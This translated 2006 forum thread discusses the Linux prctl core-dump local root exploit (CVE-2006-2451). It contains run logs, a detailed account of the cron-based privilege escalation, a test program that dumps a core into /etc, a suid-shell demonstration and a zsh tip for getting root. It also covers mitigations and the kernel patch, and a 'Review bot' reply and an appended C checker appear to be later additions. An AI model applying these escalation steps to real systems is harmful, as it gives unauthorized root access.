Rather not :(
From: Stoian Ivanov <sdr__at__mail[ tochka ]bg>
On: 12-07-2006@10:38 GMT+2
Rating: 1/Neutral
sdr@sdr /space $ gcc -o rs_prctl_kernel rs_prctl_kernel.c
sdr@sdr /space $ ./rs_prctl_kernel
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]
[*] Creating Cron entry
[*] Sleeping for aprox. one minute (** please wait **)
[*] Running shell (remember to remove /tmp/sh when finished) ...
sh: /tmp/sh: No such file or directory
sdr@sdr /space $ uname -a
Linux sdr 2.6.17-gentoo-r2 #1 PREEMPT Fri Jul 7 16:07:54 EEST 2006 i686 AMD Sempron(tm) 2500+ AuthenticAMD GNU/Linux
sdr@sdr /space $
[Reply to this comment]
Re: Rather not :(
From: gat3way
On: 12-07-2006@10:53 GMT+2
Rating: 1/Neutral
sdr, your kernel is patched, that's why it doesn't work.
I just want to say that you don't have to follow these advisories 1:1 and replace your kernel in order to protect yourselves. It's enough to add these 2 lines to /etc/security/limits.conf (as long as you use PAM):
* hard core 1
* soft core 1
<blank line>
This way the exploit is elegantly thwarted, since there is no way the code of /bin/sh could fit within a 1 KB coredump.
The fs.suid_dumpable sysctl should solve the problem if it is set to 0 or 2, at least according to the documentation, but for me the exploit works with all 3 possible values..
[Reply to this comment]
Re: Re: Rather not :(
From: growchie <growchie__at__yahoo< dot >com>
On: 12-07-2006@12:13 GMT+2
Rating: 1/Neutral
that thing with the core size won't solve your problem. your payload is under 200 bytes.
Obviously gentoo was patched quite a while ago.
Edited on: 12-07-2006@12:15
[Reply to this comment]
Re: Re: Re: Rather not :(
From: gat3way <mrangelov__at__globul__dot__bg>
On: 12-07-2006@12:51 GMT+2
Rating: 2/Educational/Wise
Actually, I've now looked at the source more closely.
The size of the payload has some relevance, but it isn't decisive; it could easily be even 10 bytes and a coredump limit of 1 KB would still stop it.
So first I'll explain the idea of the exploit (and why *payload is never passed as a parameter anywhere)
1) memory is reserved and filled with a certain value (payload). It is important, very important, that the string used to initialize this memory sits in cleartext in the binary of the compiled exploit, i.e.:
gat3way@gat3way:~$ grep /tmp/sh /tmp/exploit
Binary file /tmp/exploit matches
2) a child process is forked. prctl called this way makes its coredump get written with root privileges. The coredump size limits are raised to the maximum possible (i.e. the hard limit imposed by root)
3) The parent process kills the child with SIGSEGV (which in principle makes the kernel produce a coredump, an image of the memory occupied by the segfaulted program)
4) In /etc/cron.d (where it gets dumped), every file is executed as long as it is in a format similar to /etc/crontab.
5) cron checks every minute whether there is something in cron.d, whereupon it discovers the core file. That's why the magic with sleep is done, to make sure cron will pass at least once (on the round minute)
6) Skipping the meaningless binary garbage in the dump, the cron daemon reaches the place in it where the string used to initialize payload is kept
7) That makes cron execute the bad command as root (copy a suid /bin/sh elsewhere)
8) it executes it (/tmp/sh). Everyone knows what happens if you run a shell owned by root with the suid flag set...
-----------------
Why does a coredump limit of 1 KB effectively solve the problem?
- compiled on my machine, this string is at position 1913 of the 8341-byte compiled exploit. Even if part of the memory up to 1 KB gets dumped, this string doesn't come into the picture at all.
- another matter is that with such a limit nothing will be dumped at all, since the kernel doesn't produce a coredump if the memory used by the process is larger than the limit, i.e. it is not that only part of the memory is dumped, but nothing at all. That's the reason why, if you have a hard limit set, you won't see any core file in /etc/cron.d. Even though that rm -f /etc/cron.d/core in the payload won't be executed at all.
[Reply to this comment]
Re: Re: Re: Re: Rather not :(
From: growchie <growchie< at >yahoo __tochka__ com>
On: 12-07-2006@13:06 GMT+2
Rating: 1/Neutral
aha, well great. that thing about core files is good to know, since they're dangerous on the whole. I'll go and set hard limits myself too. the problem is that, written this way, the exploit checks nothing and a lot of people may be left with the impression that they're fine.
[Reply to this comment]
Re: Re: Re: Re: Re: Rather not :(
From: gat3way
On: 12-07-2006@13:18 GMT+2
Rating: 1/Neutral
Sorry, you can have a hard limit and the exploit may still get through; I meant a *sufficiently_low_hard_limit*
Also - it has to be set by root, since the exploit raises its own limit as far as it is allowed to.
[Reply to this comment]
Re: Re: Re: Re: Re: Rather not :(
From: gat3way
On: 12-07-2006@18:28 GMT+2
Rating: 1/Neutral
Damn, many applications that authenticate against /etc/passwd, for example, don't have the habit of zeroing some of their variables... which is where many troubles start :)
[Reply to this comment]
Re: Re: Rather not :(
From: gustav
On: 13-07-2006@11:01 GMT+2
Rating: 1/Neutral
it gave me a shell, but it's not with root rights :-)
Linux venera.code.bg 2.6.16-3mdk #1 Wed Jun 28 20:23:44 CEST 2006 i686 Intel(R) Pentium(R) 4 CPU 2.40GHz unknown GNU/Linux
[Reply to this comment]
Re: Rather not :(
From: exabyte <exabyte (a) 3mhz __tochka__ net>
On: 12-07-2006@15:15 GMT+2
Rating: 1/Neutral
The exploit isn't built so as to work on all kinds of systems. Mine, for example, is vulnerable, but it doesn't work. Keep that in mind when you test.
To be really sure, create the directory /etc/cron.d and see whether a core file appears in it.
[Reply to this comment]
Re: Rather not :(
From: growchie <growchie (a) yahoo__dot__com>
On: 12-07-2006@11:06 GMT+2
Rating: 1/Neutral
Is anyone clear on what char *payload is passed to as a parameter?
Hm, it isn't passed. it's rather dumped.
Edited on: 12-07-2006@11:08
[Reply to this comment]
Re: Rather not :(
From: Admire
On: 12-07-2006@10:54 GMT+2
Rating: 1/Neutral
I tried on 3 Gentoo machines, one with kernel 2.6.13-gentoo-r5, and it doesn't work.
[Reply to this comment]
Something seems to be failing!
From: daninel
On: 12-07-2006@10:48 GMT+2
Rating: 1/Neutral
daninel@monsters:/tmp$ ./a.out
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]
[*] Creating Cron entry
[*] Sleeping for aprox. one minute (** please wait **)
[*] Running shell (remember to remove /tmp/sh when finished) ...
sh: /tmp/sh: No such file or directory
daninel@monsters:/tmp$ uname
Linux
daninel@monsters:/tmp$ uname -a
Linux monsters 2.6.16.24 #2 PREEMPT Mon Jul 10 17:29:33 EEST 2006 i686 athlon-4 i386 GNU/Linux
daninel@monsters:/tmp$
In 2.6.16.24 the bug is fixed - not only in 2.6.17.4
commit 407972755b44d0a18647dab1f1e62df80b6638d0
Author: Greg Kroah-Hartman <gregkh@suse.de>
Date: Thu Jul 6 13:06:01 2006 -0700
Linux 2.6.16.24
commit 9e4e45f19bdd41b4091e5fe556f816f4046c7598
Author: Greg Kroah-Hartman <gregkh@suse.de>
Date: Thu Jul 6 13:05:42 2006 -0700
fix prctl privilege escalation and suid_dumpable (CVE-2006-2451)
Based on a patch from Ernie Petrides
During security research, Red Hat discovered a behavioral flaw in core
dump handling. A local user could create a program that would cause a
core file to be dumped into a directory they would not normally have
permissions to write to. This could lead to a denial of service (disk
consumption), or allow the local user to gain root privileges.
Signed-off-by: Greg Kroah-Hartman <gregkh@suse.de>
[Reply to this comment]
How to fix the problem on 2.6.1x
From: daninel
On: 12-07-2006@11:08 GMT+2
Rating: 2/Informative
Find
case PR_SET_DUMPABLE:
if (arg2 < 0 || arg2 > 2) {
in kernel/sys.c and replace it with:
case PR_SET_DUMPABLE:
if (arg2 < 0 || arg2 > 1) {
The difference is that 2 becomes 1 in "arg2 >". You don't need to change the kernel, but recompiling can't be avoided.
[Reply to this comment]
Re: How to fix the problem on 2.6.1x
From: growchie <growchie (a) yahoo __tochka__ com>
On: 12-07-2006@11:14 GMT+2
Rating: 1/Neutral
WHOAAA, what a solution you gave.
http://www.die.net/doc/linux/man/man2/p...
PR_SET_DUMPABLE
(Since Linux 2.4) Set the state of the flag determining whether core dumps are produced for this process upon delivery of a signal whose default behaviour is to produce a core dump. (Normally this flag is set for a process by default, but it is cleared when a set-user-ID or set-group-ID program is executed and also by various system calls that manipulate process UIDs and GIDs). In kernels up to and including 2.6.12, arg2 must be either 0 (process is not dumpable) or 1 (process is dumpable). Since kernel 2.6.13, the value 2 is also permitted; this causes any binary which normally would not be dumped to be dumped readable by root only. (See also the description of /proc/sys/fs/suid_dumpable in proc(5).)
If you change 2 to 1 on line 38, what will happen, won't there still be a problem? (I'm just speculating, I haven't seen the code of sys.c).
[Reply to this comment]
Re: How to fix the problem on 2.6.1x
From: growchie <growchie __@__ yahoo[ tochka ]com>
On: 12-07-2006@11:21 GMT+2
Rating: 1/Neutral
If you're right about that 2 - the parameter for readable only by root is the key. Privileges should be delegated, or at least the ownership of the dump should be changed in that case. Interesting how something meant to increase security actually decreases it :)
Edited on: 12-07-2006@11:51
[Reply to this comment]
Re: How to fix the problem on 2.6.1x
From: kip
On: 14-07-2006@8:06 GMT+2
Rating: 1/Neutral
I recompiled the kernel
replacing this in kernel/sys.c
case PR_SET_DUMPABLE:
if (arg2 < 0 || arg2 > 2) {
with:
case PR_SET_DUMPABLE:
if (arg2 < 0 || arg2 > 1) {
as daninel says, and things got fixed
[Reply to this comment]
Re: How to fix the problem on 2.6.1x
From: kip
On: 14-07-2006@8:34 GMT+2
Rating: 1/Neutral
This is from the patch for kernel 2.6.17.4:
diff --git a/kernel/sys.c b/kernel/sys.c
index 0b6ec0e..59273f7 100644
--- a/kernel/sys.c
+++ b/kernel/sys.c
@@ -1991,7 +1991,7 @@ asmlinkage long sys_prctl(int option, un
error = current->mm->dumpable;
break;
case PR_SET_DUMPABLE:
- if (arg2 < 0 || arg2 > 2) {
+ if (arg2 < 0 || arg2 > 1) {
error = -EINVAL;
break;
}
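Review bot: the `arg2 < 0` half of the condition on the `+` line is dead code if `arg2` is unsigned, which the truncated `sys_prctl(int option, un` in the hunk header suggests (prctl's arguments are `unsigned long` in the kernel); with the accepted range now 0..1 the test could simply read `if (arg2 > 1) {` and avoid the always-false comparison. Also worth confirming that this sys.c hunk is only one part of the 2.6.17.4 fix: the commit title quoted earlier in the thread names both "prctl privilege escalation and suid_dumpable", and restricting what prctl accepts says nothing about how a dump that is already marked root-readable is handled, so the remaining hunks of that patch should be applied together with this one.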
[Reply to this comment]
It doesn't work for me either
From: m0rph
On: 12-07-2006@11:20 GMT+2
Rating: 1/Neutral
jack@sgc:~/test$ ./rs_prctl_kernel
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]
[*] Creating Cron entry
[*] Sleeping for aprox. one minute (** please wait **)
[*] Running shell (remember to remove /tmp/sh when finished) ...
sh: /tmp/sh: No such file or directory
jack@sgc:~/test$ uname -a
Linux sgc 2.6.15.1 #3 SMP PREEMPT Sat Feb 4 17:33:38 EET 2006 i686 athlon-4 i386 GNU/Linux
This is a standard 2.6.15.1 kernel downloaded from kernel.org and compiled by me.
[Reply to this comment]
Re: It doesn't work for me either
From: growchie <growchie< at >yahoo[ tochka ]com>
On: 12-07-2006@11:45 GMT+2
Rating: 1/Neutral
Do you have cron running, and can your user read the cron directory?
[Reply to this comment]
Re: Re: It doesn't work for me either
From: m0rph
On: 12-07-2006@13:25 GMT+2
Rating: 1/Neutral
cron is running, I changed the permissions of /var/spool and its subdirectories and the result was the same, i.e. none
[Reply to this comment]
Re: Re: Re: It doesn't work for me either
From: growchie <growchie< at >yahoo __tochka__ com>
On: 12-07-2006@13:29 GMT+2
Rating: 1/Neutral
the exploit rather tries to write in /etc/cron.d.
[Reply to this comment]
Not very credible
From: growchie <growchie (a) yahoo __tochka__ com>
On: 12-07-2006@11:29 GMT+2
Rating: 1/Neutral
From what I see in this code, it relies on the core file containing a cron command to run a shell or something else. Obviously it relies on someone executing this file. If read permissions on the cron directory are denied for everyone except the cron user, that chdir should fail. Consequently this exploit may not work for that reason, and not because the kernel is fine. If there is no cron running, the exploit won't work either. So don't trust this particular code too much.
Does anyone badly want to try this?
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <sys/prctl.h>      /* prototype for prctl(); pulls in linux/prctl.h */
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
#include <sys/wait.h>

/* Marker string; it lives in the binary's data segment, so it ends up inside the core image. */
char *payload = "Sistemata ne e v red";

int main(void) {
    pid_t child;
    struct rlimit corelimit;
    printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
    printf("By: dreyer & RoMaNSoFt\n");
    printf("[ 10.Jul.2006 ]\n\n");
    /* Raise the core size limit as far as the hard limit allows. */
    corelimit.rlim_cur = RLIM_INFINITY;
    corelimit.rlim_max = RLIM_INFINITY;
    setrlimit(RLIMIT_CORE, &corelimit);
    printf("[*] Creating /etc/core\n");
    if (!(child = fork())) {
        /* Child: move to /etc, ask for a root-readable dump (value 2), then wait to be killed. */
        chdir("/etc");
        prctl(PR_SET_DUMPABLE, 2);
        sleep(200);
        exit(1);
    }
    /* Give the child time to chdir() and call prctl() before the signal arrives. */
    sleep(1);
    kill(child, SIGSEGV);
    wait(NULL);
    printf("[*] Exiting. Check for core file in /etc containing Sistemata ne e v red\n");
    return 0;
}
Edited on: 12-07-2006@11:56
[Reply to this comment]
Re: Not very credible
From: Stoian Ivanov <sdr< at >mail__dot__bg>
On: 12-07-2006@13:13 GMT+2
Rating: 1/Neutral
sdr@sdr ~ $ indent <tst.c
#include <stdio.h>
#include <sys/time.h>
#include <sys/resource.h>
#include <unistd.h>
#include <linux/prctl.h>
#include <stdlib.h>
#include <sys/types.h>
#include <signal.h>
char *payload = "Sistemata ne e v red";
int
main ()
{
int child;
struct rlimit corelimit;
printf ("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf ("By: dreyer & RoMaNSoFt\n");
printf ("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit (RLIMIT_CORE, &corelimit);
printf ("[*] Creating /etc/core\n");
if (!(child = fork ()))
{
chdir ("/etc");
prctl (PR_SET_DUMPABLE, 2);
sleep (200);
exit (1);
}
kill (child, SIGSEGV);
printf
("[*] Exiting. Check for core file in /etc containing Sistemata ne e v red\n");
}
sdr@sdr ~ $ gcc tst.c -o tst
sdr@sdr ~ $ ./tst
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]
[*] Creating /etc/core
[*] Exiting. Check for core file in /etc containing Sistemata ne e v red
sdr@sdr ~ $ su
Password:
root@sdr ~ # grep 'Sistemata ne e v red' /etc/*
grep: /etc/yp.conf: No such file or directory
root@sdr ~ #
[Reply to this comment]
Re: Re: Not very credible
From: growchie <growchie< at >yahoo__dot__com>
On: 12-07-2006@13:18 GMT+2
Rating: 1/Neutral
well great
Edited on: 12-07-2006@13:25
[Reply to this comment]
This exploit is of the "if and if and if .." kind
From: Stoian Ivanov <sdr __@__ mail< dot >bg>
On: 12-07-2006@11:35 GMT+2
Rating: 1/Neutral
A production kernel with debug options enabled? Hm? Not that it's bad that they caught and fixed it, but at least don't spread FUD
Edited on: 12-07-2006@11:35
[Reply to this comment]
Nonsense
From: Linux TorWald
On: 12-07-2006@12:05 GMT+2
Rating: 1/Neutral
Nonsense, is this Windoze or what? !!! :-P
[Reply to this comment]
Hmmm, well
From: smelkomar
On: 12-07-2006@14:03 GMT+2
Rating: 1/Neutral
And what about BSD, does it have such a problem?
[Reply to this comment]
Re: Hmmm, well
From: Stoian Ivanov <sdr< at >mail __tochka__ bg>
On: 12-07-2006@14:32 GMT+2
Rating: 1/Neutral
Is there anyone to audit BSD so we can see whether it has similar problems?
[Reply to this comment]
Re: Re: Hmmm, well
From: growchie <growchie (a) yahoo[ tochka ]com>
On: 12-07-2006@15:21 GMT+2
Rating: 1/Neutral
I think there's no prctl() there. But I'm not sure.
[Reply to this comment]
Kubuntu with kernel 2.6.15-25
From: growchie <growchie __@__ yahoo[ tochka ]com>
On: 12-07-2006@15:33 GMT+2
Rating: 1/Neutral
Not patched. Be careful!
Are these people crazy, how could they leave the root directory with 40755 permissions. Outrageous!
Permissions 40700 render the exploit useless.
Update: The problem seems to be fixed in 2.6.15-26
Edited on: 12-07-2006@16:05
[Reply to this comment]
gentoo - works to some extent
From: AngelFire <af__at__0xAF[ tochka ]org>
On: 13-07-2006@17:09 GMT+2
Rating: 1/Neutral
on my gentoo with an older kernel it works to a certain extent ...
af@mobile ~ $ ls -lad /tmp/
drwxrwxrwt 63 root root 32768 2006-07-13 20:00 /tmp/
[one minute isn't always enough for me and I had to run it 2-3 times to coincide with the cron daemon]
af@mobile ~ $ ./a.out
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]
[*] Creating Cron entry
[*] Sleeping for aprox. one minute (** please wait **)
[*] Running shell (remember to remove /tmp/sh when finished) ...
sh-3.1$ id -a
uid=1000(af) gid=100(users) groups=6(disk),10(wheel),11(floppy),17(console),18(audio),19(cdrom),26(tape),27(video),35(games),80(cdrw),84(nut),85(usb),100(users),250(portage),413(vmware),414(qemu)
sh-3.1$ cat /etc/shadow
cat: /etc/shadow: Permission denied
sh-3.1$ ls -la /tmp/sh
-rwsr-xr-x 1 root root 645852 2006-07-13 20:07 /tmp/sh
sh-3.1$ uname -a
Linux mobile 2.6.16-suspend2-r8-af #1 Mon Jul 10 16:35:53 EEST 2006 i686 Intel(R) Pentium(R) M processor 1.70GHz GenuineIntel GNU/Linux
as can be seen (at least at first glance) the exploit works correctly ... except it doesn't give me root rights ... but it's probably something in my system's settings...
there's probably some trick with /tmp and my suid shell ... otherwise I see no reason for it not to give me root rights
edit:
I tried on another gentoo machine too:
Linux angelfire 2.6.15-gentoo-af #1 SMP PREEMPT Fri Jan 6 18:50:49 EET 2006 i686 Intel(R) Pentium(R) 4 CPU 2.40GHz GNU/Linux
exactly the same effect... no root
Edited on: 13-07-2006@17:16
[Reply to this comment]
Apparently it worked on debian
From: growchie <growchie< at >yahoo[ tochka ]com>
On: 13-07-2006@19:08 GMT+2
Rating: 1/Neutral
See the news about gluck.debian.org
[Reply to this comment]
Re: gentoo - works to some extent
From: zinder
On: 14-07-2006@7:01 GMT+2
Rating: 1/Neutral
there's a little trick :) the exploit works fine, so install 2.6.17.4, on that one it definitely doesn't work!
[Reply to this comment]
Re: gentoo - works to some extent
From: ivan <iivanov< at >abv__dot__bg>
On: 13-07-2006@21:45 GMT+2
Rating: 1/Neutral
Yes, but that's something specific to Gentoo; I tried on a debian machine with the latest gentoo-hardened-2.6.14-r8 and it works like a champ. I suspect that in gentoo, since you pick yourself which cron to install, that's why it doesn't work. Pff, screw hardened :)))
[Reply to this comment]
Re: Re: gentoo - works to some extent
From: AngelFire <af< at >0xAF[ tochka ]org>
On: 14-07-2006@8:57 GMT+2
Rating: 1/Neutral
nah ... it's not the cron ... it does its job ... it copies /tmp/sh for me, everything goes smoothly ... except I should have root rights, but in practice I don't
[Reply to this comment]
well, binki doesn't have this problem
From: Karaman <vandread< at >abv__dot__bg>
On: 14-07-2006@7:38 GMT+2
Rating: 1/Neutral
and I haven't patched the kernel as far as I remember :)
tested on:
Linux binki 2.6.16.2 #15 SMP PREEMPT Tue Jun 20 23:50:46 EEST 2006 i686 athlon-4 i386 GNU/Linux
result:
karaman@binki:~$ ./rs_prctl_kernel
Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t
By: dreyer & RoMaNSoFt
[ 10.Jul.2006 ]
[*] Creating Cron entry
[*] Sleeping for aprox. one minute (** please wait **)
[*] Running shell (remember to remove /tmp/sh when finished) ...
sh: /tmp/sh: No such file or directory
the other one gives me:
-su: ./test.o: Permission denied
interesting little exploit btw
Edited on: 14-07-2006@7:46
[Reply to this comment]
whoever doesn't believe it works ....
From: zinder
On: 14-07-2006@13:37 GMT+2
Rating: 1/Neutral
whoever thinks the exploit doesn't work on the listed kernels doesn't know how to work with the exploit (let's not forget you also need a bit of imagination :))!!! People, you simply don't know how it's done ... stop talking nonsense, I'm starting to get annoyed :)
[Reply to this comment]
one small problem
From: fen386 <zonered __@__ mail< dot >bg>
On: 14-07-2006@16:07 GMT+2
Rating: 1/Neutral
So...
You understand C, but shells - not so much :)
Quote (from gateway):
"it executes it (/tmp/sh). Everyone knows what happens if you run a shell owned by root with the suid flag set..."
You CANNOT start a BASH shell as an ordinary user in such a way that you have root privileges, even if it has the suid flag. A vulnerable shell is ZSH, for example. If you have it installed (most distros do), replace cp /bin/sh /tmp/sh with cp /bin/zsh /tmp/sh and it will work :)
[Reply to this comment]
Re: one small problem
From: gat3way <mrangelov__at__globul[ tochka ]bg>
On: 14-07-2006@22:03 GMT+2
Rating: 1/Neutral
we easily can :)
gat3way@debian:/tmp$ cp /bin/sh /tmp
gat3way@debian:/tmp$ su -c "chown root:root sh"
Password:
gat3way@debian:/tmp$ su -c "chmod u+s sh"
Password:
gat3way@debian:/tmp$ ls -l sh
-rwsr-xr-x 1 root root 625228 2006-07-15 01:57 sh
gat3way@debian:/tmp$ ./sh
sh-2.05b# id
uid=1000(gat3way) gid=1000(gat3way) euid=0(root) groups=20(dialout),24(cdrom),25(floppy),29(audio),44(video),46(plugdev),1000(gat3way)
Note: no selinux
[Reply to this comment]
Debian Sarge
From: Georgi Tellalov
On: 16-07-2006@10:11 GMT+2
Rating: 1/Neutral
I tried it on Debian Sarge and it didn't work. Then I tried it on Debian Sarge with kernel 2.6.15-1-amd64-k8 from backports.org and there it worked. I read a very elegant solution in one of the blogs on planet Debian - add the line:
kernel.core_pattern=/root/core
to /etc/sysctl.conf and the exploit no longer works.
Edited on: 16-07-2006@10:11
[Reply to this comment]
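As an added example (not code from this thread, the exploit authors, or the kernel project), here is a C check that pulls together the three defences discussed above: gat3way's hard core limit via limits.conf, daninel's kernel change (after which prctl rejects PR_SET_DUMPABLE=2), and Georgi Tellalov's absolute kernel.core_pattern. It assumes Linux with /proc mounted; the 1 KB threshold mirrors the "hard core 1" line from the thread, and the function names are my own.

```c
#include <stdio.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/resource.h>
#include <unistd.h>

/* Patched kernels (2.6.17.4 / 2.6.16.24 and later) reject PR_SET_DUMPABLE
 * with value 2 and return EINVAL.  Returns 1 if the running kernel still
 * accepts it (the unfixed behaviour the thread's test programs rely on),
 * else 0.  Any other failure (e.g. a sandbox denying prctl) also yields 0. */
int kernel_accepts_dumpable_2(void)
{
    if (prctl(PR_SET_DUMPABLE, 2, 0, 0, 0) == 0) {
        prctl(PR_SET_DUMPABLE, 1, 0, 0, 0); /* restore the default state */
        return 1;
    }
    return 0;
}

/* gat3way's mitigation: a hard RLIMIT_CORE set by root that is smaller than
 * the child's memory image means no core file is written at all.  limits.conf
 * counts in KB, so "hard core 1" is 1024 bytes (threshold assumed from the
 * thread).  Returns 1 if the hard limit is that restrictive. */
int hard_core_limit_is_restrictive(rlim_t hard_limit)
{
    return hard_limit != RLIM_INFINITY && hard_limit <= 1024;
}

/* Georgi Tellalov's mitigation: an absolute core_pattern pins every dump to a
 * fixed path, so the child's chdir() into /etc/cron.d no longer matters.
 * Takes the content of /proc/sys/kernel/core_pattern (trailing newline ok). */
int core_pattern_is_absolute(const char *pattern)
{
    return pattern != NULL && pattern[0] == '/';
}

/* Hard core limit of the calling process; RLIM_INFINITY if it can't be read. */
rlim_t current_hard_core_limit(void)
{
    struct rlimit rl;
    if (getrlimit(RLIMIT_CORE, &rl) != 0)
        return RLIM_INFINITY;
    return rl.rlim_max;
}

/* Reads one /proc/sys value into buf without its newline; returns 0 on failure. */
static int read_proc_sys(const char *path, char *buf, size_t len)
{
    FILE *f = fopen(path, "r");
    if (!f) return 0;
    if (!fgets(buf, (int)len, f)) { fclose(f); return 0; }
    fclose(f);
    buf[strcspn(buf, "\n")] = '\0';
    return 1;
}

int main(void)
{
    char pattern[256] = "";
    read_proc_sys("/proc/sys/kernel/core_pattern", pattern, sizeof pattern);
    printf("kernel accepts PR_SET_DUMPABLE=2 : %s\n",
           kernel_accepts_dumpable_2() ? "yes (unpatched)" : "no (patched)");
    printf("hard RLIMIT_CORE restrictive     : %s\n",
           hard_core_limit_is_restrictive(current_hard_core_limit()) ? "yes" : "no");
    printf("core_pattern absolute            : %s (%s)\n",
           core_pattern_is_absolute(pattern) ? "yes" : "no", pattern);
    return 0;
}
```

Run it as the ordinary user whose limits you want to verify, since the hard limit reported is the one PAM applied to that login session.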
Re: Debian Sarge
From: gerasim
On: 16-07-2006@13:55 GMT+2
Rating: 1/Neutral
well, that's why I'm on BSD :)
anyway, nobody says anything about this - http://milw0rm.com/exploits/2013
and take a look at what interesting thing there is here; for me under FreeBSD it worked: http://milw0rm.com/exploits/1596
[Reply to this comment]